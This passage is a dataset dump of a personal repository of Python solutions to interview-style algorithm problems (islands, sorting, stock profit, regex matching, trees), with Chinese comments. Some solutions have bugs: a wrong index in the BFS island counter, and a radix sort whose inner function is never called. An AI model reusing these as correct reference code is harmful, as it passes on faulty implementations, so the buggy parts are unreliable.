"content_id": "50d73923d05572d71b64e66f8e0cb015f0dc51bd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2484,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 89,
"path": "/leetcode-200岛屿数量.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/8/26 下午11:14\n# @Author : Meng Xiao\nclass Solution:\n # 1 DFS\n def numIslands(self, grid):\n if not grid:\n return 0\n row = len(grid)\n col = len(grid[0])\n cnt = 0\n\n def dfs(i, j):\n grid[i][j] = '0'\n for x, y in [[-1, 0], [1, 0], [0, -1], [0, 1]]:\n tmp_i = i + x\n tmp_j = j + y\n if 0 <= tmp_i < row and 0 <= tmp_j < col and grid[tmp_i][tmp_j] == '1':\n dfs(tmp_i, tmp_j)\n\n for i in range(row):\n for j in range(col):\n if grid[i][j] == '1':\n dfs(i, j)\n cnt += 1\n return cnt\n\n # bfs\n def numIsLands_bfs(self, grid):\n if not grid:\n return 0\n row = len(grid)\n col = len(grid[0])\n cnt = 0\n\n def bfs(i, j):\n queue = []\n queue.append((i, j))\n grid[i][j] = '0'\n while queue:\n i, j = queue.pop(0)\n for x, y in [[-1, 0], [1, 0], [0, -1], [0, 1]]:\n tmp_i = i + x\n tmp_j = j + y\n if 0 <= tmp_i < row and 0 <= tmp_j < col and grid[tmp_i][tmp_j] == '1':\n grid[tmp_j][tmp_j] = '0'\n queue.append((tmp_i ,tmp_j))\n\n for i in range(row):\n for j in range(col):\n if grid[i][j] == '1':\n bfs(i, j)\n cnt += 1\n return cnt\n\n # 并查集\n def numIslands_b(self, grid):\n\n if not grid:\n return 0\n row = len(grid)\n col = len(grid[0])\n\n f = {}\n\n def find(x):\n f.setdefault(x, x)\n if f[x] != x:\n f[x] = find(f[x])\n return f[x]\n\n def union(x, y):\n f[find(x)] = find(y)\n\n for i in range(row):\n for j in range(col):\n if grid[i][j] == '1':\n for x, y in [[1, 0], [0, 1]]:\n tmp_i = i + x\n tmp_j = j + y\n if 0 <= tmp_i < row and 0 <= tmp_j < col and grid[tmp_i][tmp_j] == '1':\n union(tmp_i*col+tmp_j, i*col+j)\n\n res = set()\n for i in range(row):\n for j in range(col):\n if grid[i][j] == '1':\n res.add(find(i*col+j))\n return len(res)"
},
{
"alpha_fraction": 0.43583816289901733,
"alphanum_fraction": 0.4809248447418213,
"avg_line_length": 24.47058868408203,
"blob_id": "50653fd01b58a2925679c33ae87fe9e95f556581",
"content_id": "de767ae17d13554aea3af82e2b84964daf73888c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 915,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 34,
"path": "/数组中只出现一次的两个数字.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/18 下午7:04\n# @Author : Meng Xiao\nclass Solution:\n def FindNumsAppearOnce(self, array):\n if array == None:\n return []\n xor = 0\n for i in array:\n xor ^= i\n idxOf1 = self.getFirstIdx(xor)\n num1 = num2 = 0\n for j in range(len(array)):\n if self.IsBit(array[j], idxOf1):\n num1 ^= array[j]\n else:\n num2 ^= array[j]\n return num1, num2\n\n def getFirstIdx(self, num):\n # 寻找num中第一个1的位置(从右往左)\n idx = 0\n while num & 1 == 0 and idx <= 32:\n idx += 1\n num = num >> 1\n return idx\n\n def IsBit(self, num, indexBit):\n # 判断num的第indexBit位是不是1\n num = num >> indexBit\n return num & 1\n\ns = Solution()\nprint(s.FindNumsAppearOnce([2,4,3,6,3,2,5,5]))"
},
{
"alpha_fraction": 0.4494117498397827,
"alphanum_fraction": 0.4752941131591797,
"avg_line_length": 24.75757598876953,
"blob_id": "adf912f139333818c5629d750c2ec1493b3f5866",
"content_id": "c42792193be6b2940a00de56093fb8da3476ad14",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 854,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 33,
"path": "/数组中出现次数超过一半的数字.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/13 下午2:29\n# @Author : Meng Xiao\n\n\nclass Solution:\n def MoreThanHalfNum(self, numbers):\n length = len(numbers)\n if not numbers:\n return 0\n result = numbers[0]\n times = 1\n\n for i in range(1, length):\n if times == 0:\n result = numbers[i]\n times = 1\n elif numbers[i] == result:\n times += 1\n else:\n times -= 1\n if not self.CheckMoreThanHalf(numbers, length, result):\n return False\n return result\n\n def CheckMoreThanHalf(self, numbers, length, number):\n times = 0\n for i in range(length):\n if numbers[i] == number:\n times += 1\n if times * 2 <= length:\n return False\n return True\n"
},
{
"alpha_fraction": 0.3487544357776642,
"alphanum_fraction": 0.41281139850616455,
"avg_line_length": 20.538461685180664,
"blob_id": "a13642d6eeceeca472052eb76ffa9b179a90ea68",
"content_id": "6a3d9e2f59dfd84d8a45a53e033ec7a9f7ac37ba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 285,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 13,
"path": "/二进制中1的个数.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/3/27 下午9:33\n# @Author : Meng Xiao\n\nclass Solution:\n def Numberof1(self, n):\n count = 0\n if n < 0:\n n = n & 0xffffffff\n while n != 0:\n count += 1\n n = (n - 1) & n\n return count\n\n"
},
{
"alpha_fraction": 0.4883260726928711,
"alphanum_fraction": 0.5152354836463928,
"avg_line_length": 30.97468376159668,
"blob_id": "e89d29d632dc6d9b391844695024c1466c7841dd",
"content_id": "4bdfab86778ac2ed7371a489d084c24f0dd41226",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2869,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 79,
"path": "/股票的最大利润.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/18 下午9:45\n# @Author : Meng Xiao\nclass Solution:\n # 只允许交易一次\n def maxDiff1(self, numbers):\n if not numbers or len(numbers) < 2:\n return 0\n minD = numbers[0] # 保存前i-1个数字的最小值\n maxDiff = numbers[1] - minD\n for i in range(2, len(numbers)):\n if numbers[i-1] < minD:\n minD = numbers[i-1]\n curDiff = numbers[i] - minD\n if curDiff > maxDiff:\n maxDiff = curDiff\n return maxDiff\n\n # 允许无数次交易\n def maxProfit(self, prices):\n if not prices or len(prices) < 2:\n return 0\n maxprof = 0\n minprice = 2 ** 32\n for p in prices:\n # 如果今天价格小于昨日价格,只更新minprice\n if p <= minprice:\n minprice = p\n # 今天价格大于昨日价格,最终受益加上这一段,并更新\n else:\n maxprof += (p-minprice)\n minprice = p\n return maxprof\n\n # 允许2次交易\\\n '''\n 动态规划法。以第i天为分界线,计算第i天之前进行一次交易的最大收益preProfit[i],\n 和第i天之后进行一次交易的最大收益postProfit[i],\n 最后遍历一遍,max{preProfit[i] + postProfit[i]} (0≤i≤n-1)就是最大收益。\n 第i天之前和第i天之后进行一次的最大收益求法同1。\n '''\n def maxProfit2(self, prices):\n if not prices or len(prices) < 2:\n return 0\n n = len(prices)\n preProfit = [0] * n\n postProfit = [0] * n\n\n curMin = prices[0]\n for i in range(1, n):\n curMin = min(curMin, prices[i])\n preProfit[i] = max(preProfit[i-1], prices[i]-curMin) # 第i天卖出\n\n curMax = prices[n-1]\n for i in range(n-2, -1, -1):\n curMax = max(curMax, prices[i])\n postProfit[i] = max(postProfit[i+1], curMax-prices[i]) # 第i天买入\n\n maxProfit = 0\n for i in range(n):\n maxProfit = max(maxProfit, preProfit[i]+postProfit[i])\n\n return maxProfit\n\n # 允许K次交易\n # https://blog.csdn.net/Dr_Unknown/article/details/51939121\n def maxProfit_k(self, k, prices):\n if len(prices) < 2:\n return 0\n if k > len(prices):\n return self.maxProfit(prices)\n local = [[0 for i in range(k+1)] for j in range(len(prices))]\n globa = [[0 for i in range(k + 1)] for j in range(len(prices))]\n for i in range(1, len(prices)):\n diff = prices[i] - prices[i-1]\n for j in range(1, k+1):\n local[i][j] = max(globa[i-1][j-1]+max(0,diff), local[i-1][j]+diff)\n globa[i][j] = max(local[i][j], globa[i-1][j])\n return globa[len(prices)-1][k]\n\n"
},
{
"alpha_fraction": 0.42848336696624756,
"alphanum_fraction": 0.4475955665111542,
"avg_line_length": 29.58490562438965,
"blob_id": "2e9224b1c643d51ed4bf621b21053a208bf1ed2d",
"content_id": "072c1605664a25fd043d551cd755f14745705672",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1642,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 53,
"path": "/旋转数组的最小数字.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/3/26 下午8:20\n# @Author : Meng Xiao\nclass Solution:\n def minNumberInRotateArray(self, rotateArray):\n if len(rotateArray) == 0:\n return 0\n front = 0\n rear = len(rotateArray) - 1\n minVal = rotateArray[0]\n\n if rotateArray[front] < rotateArray[rear]:\n return rotateArray[front]\n else:\n while rear - front > 1:\n mid = (front + rear) // 2\n if rotateArray[mid] >= rotateArray[front]:\n front = mid\n elif rotateArray[mid] <= rotateArray[rear]:\n rear = mid\n elif rotateArray[front] == rotateArray[mid] == rotateArray[rear]:\n for i in range(1, len(rotateArray)):\n if rotateArray[i] < minVal:\n minVal = rotateArray[i]\n\n\n minVal = rotateArray[rear]\n return minVal\n\n\n\n# leetcode-33搜索旋转排序数组\nclass Solution2:\n def search(self, nums, target):\n if not nums:\n return -1\n left = 0\n right = len(nums) - 1\n while left <= right:\n mid = (left + right) // 2\n if nums[mid] == target:\n return mid\n if nums[mid] >= nums[left]:\n if nums[left] <= target <= nums[mid]:\n right = mid - 1\n else:\n left = mid + 1\n else:\n if nums[mid] <= target <= nums[right]:\n left = mid + 1\n else:\n right = mid - 1\n return -1\n\n"
},
{
"alpha_fraction": 0.4001966714859009,
"alphanum_fraction": 0.43067845702171326,
"avg_line_length": 22.65116310119629,
"blob_id": "4c4073c609024c94513387427dc24f0ea6ad44dd",
"content_id": "3daa7f86dd64e305b8209135a5d016213fae90dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1085,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 43,
"path": "/连续子数组的最大和.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/14 下午7:36\n# @Author : Meng Xiao\n\nclass Solution:\n '''\n 方法1 非动态规划\n '''\n def maxSum(self, alist):\n if not alist:\n return\n max_value = alist[0]\n tmpSum = alist[0]\n for i in range(1, len(alist)):\n if tmpSum < 0:\n tmpSum = alist[i]\n else:\n tmpSum += alist[i]\n if tmpSum > max_value:\n max_value = tmpSum\n return max_value\n '''\n 方法2 动态规划 dp[i]表示以第i结尾的的子数组中子数组的最大和\n '''\n def maxSumdp(self, alist):\n if not alist:\n return\n max_value = alist[0]\n dp = [0] * (len(alist)+1)\n dp[0] = alist[0]\n for i in range(1, len(alist)):\n if dp[i-1] < 0:\n dp[i] = alist[i]\n else:\n dp[i] = dp[i-1] + alist[i]\n if dp[i] > max_value:\n max_value = dp[i]\n return max_value\n\n\n\ns = Solution()\nprint(s.maxSumdp([-2,-8,-1,-5,-9]))\n"
},
{
"alpha_fraction": 0.4377387464046478,
"alphanum_fraction": 0.46982428431510925,
"avg_line_length": 37.5,
"blob_id": "98c998c0c03a34f1fd618f09f86f73a78f55bbd9",
"content_id": "6c4d68148db7943af304d3f3f18b42d39aa68356",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1537,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 34,
"path": "/正则表达式匹配.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/1 下午8:01\n# @Author : Meng Xiao\nclass Solution:\n def match(self, s, pattern):\n if len(s) == 0 and len(pattern) == 0:\n return True\n elif len(s) != 0 and len(pattern) == 0:\n return False\n elif len(s) == 0 and len(pattern) != 0:\n if len(pattern) > 1 and pattern[1] == '*':\n return self.match(s, pattern[2:])\n else:\n return False\n\n # 下面讨论s与pattern 都不为空的情况\n else:\n if len(pattern) > 1 and pattern[1] == '*':\n if s[0] != pattern[0] and pattern[0] != '.':\n return self.match(s, pattern[2:])\n\n else:\n # 如果s[0]与pattern[0]相同,且pattern[1]为*,这个时候有三种情况\n # pattern后移2个,s不变;相当于把pattern前两位当成空,匹配后面的\n # pattern后移2个,s后移1个;相当于pattern前两位与s[0]匹配\n # pattern不变,s后移1个;相当于pattern前两位,与s中的多位进行匹配,因为*可以匹配多位\n return self.match(s, pattern[2:]) or self.match(s[1:], pattern[2:]) or self.match(s[1:],pattern)\n\n # pattern第二个字符不为*的情况\n else:\n if s[0] == pattern[0] or pattern[0] == '.':\n return self.match(s[1:], pattern[1:])\n else:\n return False\n"
},
{
"alpha_fraction": 0.4306393265724182,
"alphanum_fraction": 0.46682751178741455,
"avg_line_length": 30.846153259277344,
"blob_id": "0ac45f3bb9063beed85dae8c3c59b0e49e0d5d61",
"content_id": "51a5609acb8c385e333022a48313719a405f936a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 833,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 26,
"path": "/滑动窗口的最大值.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/18 下午9:06\n# @Author : Meng Xiao\nclass Solution:\n def maxInWindows(self, num, size):\n if not num or size <= 0:\n return []\n if len(num) <= size:\n return [max(num)]\n deque = []\n index = []\n for i in range(size):\n while len(index) > 0 and num[i] > num[index[-1]]:\n index.pop()\n index.append(i)\n for i in range(size, len(num)):\n deque.append(num[index[0]])\n while len(index) > 0 and num[i] >= num[index[-1]]:\n index.pop()\n if len(index) > 0 and index[0] <= i - size:\n index.pop(0)\n index.append(i)\n deque.append(num[index[0]])\n return deque\ns = Solution()\nprint(s.maxInWindows([2,3,4,2,6,2,5,1],3))\n\n"
},
{
"alpha_fraction": 0.5347411632537842,
"alphanum_fraction": 0.5504087209701538,
"avg_line_length": 46.25806427001953,
"blob_id": "9c8d89378cde607d2e1f32016b45287acf418594",
"content_id": "fd799d2a0bf550938dc0cd4e00e23cbfab97556d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1472,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 31,
"path": "/矩阵中的路径.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/3/26 下午9:03\n# @Author : Meng Xiao\nclass Solution:\n def hasPath(self, matrix, rows, cols, string):\n if rows < 1 or cols < 1 or matrix == None or string == None:\n return False\n visited = [0] * (rows * cols)\n pathLength = 0\n for row in range(rows):\n for col in range(cols):\n if self.hasPathCore(matrix, rows, cols, row, col, string, pathLength, visited):\n return True\n return False\n\n def hasPathCore(self, matrix, rows, cols, row, col, string, pathLength, visited):\n if len(string) == pathLength:\n return True\n hasPath = False\n if row >= 0 and row < rows and col >= 0 and col < cols and matrix[row * cols + col] == string[pathLength] and not visited[row * cols + col]:\n pathLength += 1\n visited[row * cols + col] = True\n hasPath = self.hasPathCore(matrix, rows, cols, row, col - 1, string, pathLength, visited) or \\\n self.hasPathCore(matrix, rows, cols, row - 1, col, string, pathLength, visited) or \\\n self.hasPathCore(matrix, rows, cols, row, col + 1, string, pathLength, visited) or \\\n self.hasPathCore(matrix, rows, cols, row + 1, col, string, pathLength, visited)\n\n if not hasPath:\n pathLength -= 1\n visited[row * cols + col] = False\n return hasPath\n\n\n\n"
},
{
"alpha_fraction": 0.4925074875354767,
"alphanum_fraction": 0.5194805264472961,
"avg_line_length": 19.85416603088379,
"blob_id": "d52e0be480d51ec61286339dd63b3faa0ba72c14",
"content_id": "1b7ec780f5048802d0767318a6049af7c4e47584",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1015,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 48,
"path": "/二叉树的深度.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/17 下午8:50\n# @Author : Meng Xiao\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\nclass Solution:\n '''\n 递归\n '''\n def TreeDepth(self, root):\n if not root:\n return 0\n return max(self.TreeDepth(root.left), self.TreeDepth(root.right)) + 1\n '''\n 非递归\n '''\n def TreeDepth1(self, root):\n if not root:\n return 0\n queue = []\n queue.append((root, 1))\n while queue:\n curnode, depth = queue.pop(0)\n if curnode.left:\n queue.append((curnode.left, depth+1))\n if curnode.right:\n queue.append((curnode.right, depth+1))\n return depth\n\ns = Solution()\na = TreeNode(1)\nb = TreeNode(2)\nc = TreeNode(3)\nd = TreeNode(4)\ne = TreeNode(5)\nf = TreeNode(6)\ng = TreeNode(7)\na.left = b\na.right = c\nb.left = d\nb.right = e\nc.right = f\ne.left = g\n\nprint(s.TreeDepth1(a))\n"
},
{
"alpha_fraction": 0.8095238208770752,
"alphanum_fraction": 0.8095238208770752,
"avg_line_length": 20,
"blob_id": "d99c1e50226e8a4c21d52a5b11efd837dd576907",
"content_id": "0b14c1250aaf70ba87f6d03062173ca8d54b1de4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 33,
"license_type": "no_license",
"max_line_length": 20,
"num_lines": 1,
"path": "/README.md",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# 剑指OFFER题目 PYTHON实现\n"
},
{
"alpha_fraction": 0.34589502215385437,
"alphanum_fraction": 0.37685060501098633,
"avg_line_length": 28.760000228881836,
"blob_id": "8edbe04e76920b210f5b4ca81c5d4c50ece48ec4",
"content_id": "abbdd22f742e89eb8012ee2c9a0528a6bf9e6816",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 743,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 25,
"path": "/leetcode-16 最接近的三数之和.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/6/17 19:48\n# @Author : Meng Xiao\nclass Solution:\n def threeSumClosest(self, nums, target):\n if not nums or not target or len(nums) < 3:\n return\n nums.sort()\n res = nums[0] + nums[1] + nums[2]\n for i in range(len(nums) - 2):\n j = i + 1\n k = len(nums) - 1\n while j < k:\n tsum = nums[i] + nums[j] + nums[k]\n if abs(tsum - target) < abs(res - target):\n res = tsum\n if tsum < target:\n j += 1\n elif tsum > target:\n k -= 1\n else:\n j += 1\n k -= 1\n\n return res"
},
{
"alpha_fraction": 0.41046831011772156,
"alphanum_fraction": 0.4573002755641937,
"avg_line_length": 25,
"blob_id": "ce6ea354dd548d786f7db648243ab50ed4c66ba6",
"content_id": "9fa6c68366397fb5b26e171c5b0bc6526bb2d70d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 363,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 14,
"path": "/leetcode-26删除排序数组中重复项.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/6/25 19:58\n# @Author : Meng Xiao\nclass Solution:\n def removeDuplicates(self, nums):\n if len(nums) <= 1:\n return len(nums)\n slow = 0\n for i in range(1, len(nums)):\n if nums[slow] != nums[i]:\n slow += 1\n nums[slow] = nums[i]\n\n return slow + 1"
},
{
"alpha_fraction": 0.46947672963142395,
"alphanum_fraction": 0.4844961166381836,
"avg_line_length": 23.565475463867188,
"blob_id": "bcae0f5384a55d7a6c44f46b5aa498f1b6c50924",
"content_id": "c031c9ce4f168dd4f35e3225de5f2e72032f45d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4755,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 168,
"path": "/各种排序.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/3/19 下午3:04\n# @Author : Meng Xiao\n\n# 1.\ndef insert_sort(lists):\n '''\n 直接插入排序:\n 从第一个元素开始,作为已排序元素,对于未排序数据,在已排序列中\n 从后往前扫描,找到相应位置插入。\n O(n2) O(1) 稳定\n '''\n count = len(lists)\n for i in range(1, count):\n key = lists[i]\n j = i - 1\n while j >= 0:\n if lists[j] > key:\n lists[j+1] = lists[j]\n lists[j] = key\n j -= 1\n return lists\n\ndef shell_sort(lists):\n '''\n 希尔排序:\n 将整个待排序的序列分割为若干子序列分别进行直接插入排序\n O(n1.3) O(1)\n '''\n count = len(lists)\n step = 2\n group = count // step # 初始增量为数组长度的一半\n while group > 0:\n for i in range(0, group):\n j = i + group\n while j < count:\n k = j - group\n key = lists[j]\n while k >= 0:\n if lists[k] > key:\n lists[k + group] = lists[k]\n lists[k] = key\n k -= group\n j += group\n group //= step\n return lists\n\ndef select_sort(lists):\n '''\n ˙直接选择排序:\n 多趟选择,每次选择最小(大)元素放在已排末尾。\n O(n2) O(1)\n '''\n count = len(lists)\n for i in range(0, count):\n min = i\n for j in range(i + 1, count):\n if lists[min] > lists[j]:\n min = j #寻找最小的数,将最小的数索引保存\n lists[min], lists[i] = lists[i], lists[min]\n return lists\n\n\n\n\n# 堆排序,建堆,堆调整,排序\ndef adjust_heap(lists, i, size):\n lchild = 2 * i + 1\n rchild = 2 * i + 2\n max = i\n if i < size // 2:\n if lchild < size and lists[lchild] > lists[max]:\n max = lchild\n if rchild < size and lists[rchild] > lists[max]:\n max = rchild\n if max != i:\n lists[max], lists[i] = lists[i], lists[max]\n adjust_heap(lists, max, size)\n\ndef build_heap(lists, size):\n for i in range(0, (size//2))[::-1]:\n adjust_heap(lists, i, size)\n\ndef heap_sort(lists):\n size = len(lists)\n build_heap(lists, size)\n for i in range(0, size)[::-1]:\n lists[0], lists[i] = lists[i], lists[0]\n adjust_heap(lists, 0, i)\n return lists\n\ndef bubble_sort(lists):\n '''\n 两两交换 可用于内存足够的TopK\n O(n2), O(1)\n '''\n count = len(lists)\n for i in range(0,count):\n for j in range(i+1, count):\n if lists[i] > lists[j]:\n lists[i], lists[j] = lists[j], lists[i]\n return lists\n\n\ndef quick_sort(lists, left, right):\n '''\n 通过一趟排序将待排记录分隔成独立的两部分,其中一部分记录的关键字均比另一部分的关键字小,\n 则可分别对这两部分记录继续进行排序,以达到整个序列有序。\n O(nlogn) O(nlogn)\n '''\n if left >= right:\n return lists\n key = lists[left]\n low = left\n high = right\n while left < right:\n while left < right and lists[right] >= key:\n right -= 1\n lists[left] = lists[right]\n while left < right and lists[left] <= key:\n left += 1\n lists[right] = lists[left]\n lists[right] = key\n quick_sort(lists, low, left-1)\n quick_sort(lists, left+1, high)\n return lists\n\ndef merge_sort(lists):\n '''\n 归并排序,将已有序子序列合并,得到完全有序的序列\n O(nlogn), O(n) 稳定\n '''\n if len(lists) <= 1:\n return lists\n num = len(lists) // 2\n left = merge_sort(lists[:num])\n right = merge_sort(lists[num:])\n return merge(left, right)\ndef merge(left, right):\n result = []\n i ,j = 0, 0\n while i < len(left) and j < len(right):\n if left[i] <= right[j]:\n result.append(left[i])\n i += 1\n else:\n result.append(right[j])\n j += 1\n result += left[i:]\n result += right[j:]\n return result\n\ndef radix_sort(lists):\n '''\n 基数排序按照低位先排序,然后收集;再按照高位排序,然后再收集;依次类推,直到最高位。\n '''\n import math\n def radix_sort(lists, radix=10):\n k = int(math.ceil(math.log(max(lists), radix)))\n bucket = [[] for i in range(radix)]\n for i in range(1, k + 1):\n for j in lists:\n bucket[j // (radix ** (i - 1)) % (radix ** i)].append(j)\n del lists[:]\n for z in bucket:\n lists += z\n del z[:]\n return lists\n\n"
},
{
"alpha_fraction": 0.44820064306259155,
"alphanum_fraction": 0.47110140323638916,
"avg_line_length": 24.5,
"blob_id": "53ce11991ed5707bc7e49f66644b1af91a2c2071",
"content_id": "d391c94c3fa94e17142c9705055ecb005eaae93d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 973,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 36,
"path": "/字符串的排列.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/11 下午8:56\n# @Author : Meng Xiao\nclass Solution:\n\n # 全排列\n def Permutation(self, ss):\n if not ss:\n return []\n if len(ss) == 1:\n return list(ss)\n charlist = list(ss)\n charlist.sort()\n res = []\n for i in range(len(charlist)):\n if i > 0 and charlist[i] == charlist[i-1]:\n continue\n temp = self.Permutation(''.join(charlist[:i])+''.join(charlist[i+1:]))\n for j in temp:\n res.append(charlist[i] + j)\n\n return res\n\n # 全组合\n def Combination(self, ss):\n # 由于全组合含有空集,这里结果采用列表形式\n if not ss:\n return []\n res = [[]]\n charlist = list(ss)\n for i in charlist:\n for j in range(len(res)):\n res.append(res[j]+[i])\n return res\ns = Solution()\nprint(s.Permutation('111324'))"
},
{
"alpha_fraction": 0.5642105340957642,
"alphanum_fraction": 0.5894736647605896,
"avg_line_length": 38.58333206176758,
"blob_id": "ef2e7a21c9c0fbac31b09c4890fad00947c7d457",
"content_id": "12d1fc6247de020d8b449d67ce0b469b86878d85",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 475,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 12,
"path": "/leetcode-236二叉树的最近公共祖先.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/8/31 21:56\n# @Author : Meng Xiao\nclass Solution:\n def lowestCommonAncestor(self, root: 'TreeNode', p: 'TreeNode', q: 'TreeNode') -> 'TreeNode':\n if not root or p == root or q == root:\n return root\n left = self.lowestCommonAncestor(root.left, p, q)\n right = self.lowestCommonAncestor(root.right, p, q)\n if left and right:\n return root\n return left if right is None else right\n"
},
{
"alpha_fraction": 0.40271493792533875,
"alphanum_fraction": 0.4343891441822052,
"avg_line_length": 30.5,
"blob_id": "8127fa68e952bc21ae1ab8256544aa0d079a40d3",
"content_id": "a062636cdfb96a70ce877afb64b9f8f649d57b90",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 510,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 14,
"path": "/leetcode-684冗余连接.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/9/30 17:26\n# @Author : Meng Xiao\nclass Solution:\n def findRedundantConnection(self, edges):\n\n p = {i: {i} for i in range(1, len(edges) + 1)} # 并查集初始化\n for x, y in edges:\n if p[x] is not p[y]: # 如果两个集合地址不一样\n p[x] |= p[y] # 合并集合\n for z in p[y]:\n p[z] = p[x] # 修改元素集合标记的指针地址\n else:\n return [x, y]\n\n"
},
{
"alpha_fraction": 0.35760170221328735,
"alphanum_fraction": 0.4122055768966675,
"avg_line_length": 34.92307662963867,
"blob_id": "b2f1d14092ced3bf67197372b3c004ac2e8cdceb",
"content_id": "0ef2ffab5e6cb61a89bc9d43da505d52db48ede0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 948,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 26,
"path": "/leetcode-4有序数组中位数.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/5/5 21:20\n# @Author : Meng Xiao\n\nclass Solution:\n def findMedianSortedArrays(self, nums1, nums2):\n def findKth(A, B, k):\n if len(A) == 0:\n return B[k - 1]\n if len(B) == 0:\n return A[k - 1]\n if k == 1:\n return min(A[0], B[0])\n a = A[k // 2 - 1] if len(A) >= k // 2 else None\n b = B[k // 2 - 1] if len(B) >= k // 2 else None\n if b is None or (a is not None and a < b):\n return findKth(A[k // 2:], B, k - k // 2)\n return findKth(A, B[k // 2:], k - k // 2) # 因为k/2 不一定等于k-k/2\n\n n = len(nums2) + len(nums1)\n if n % 2 == 1:\n return findKth(nums1, nums2, n // 2 + 1) / 1.0\n else:\n small = findKth(nums1, nums2, n // 2)\n big = findKth(nums1, nums2, n // 2 + 1)\n return (small + big) / 2.0\n"
},
{
"alpha_fraction": 0.4739803075790405,
"alphanum_fraction": 0.48945146799087524,
"avg_line_length": 27.479999542236328,
"blob_id": "72edc8eb937d810063034aa516252a4cf0721b97",
"content_id": "fe2415a739a7db0617437032d0d701c14df34ec0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 715,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 25,
"path": "/删除链表中重复节点.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
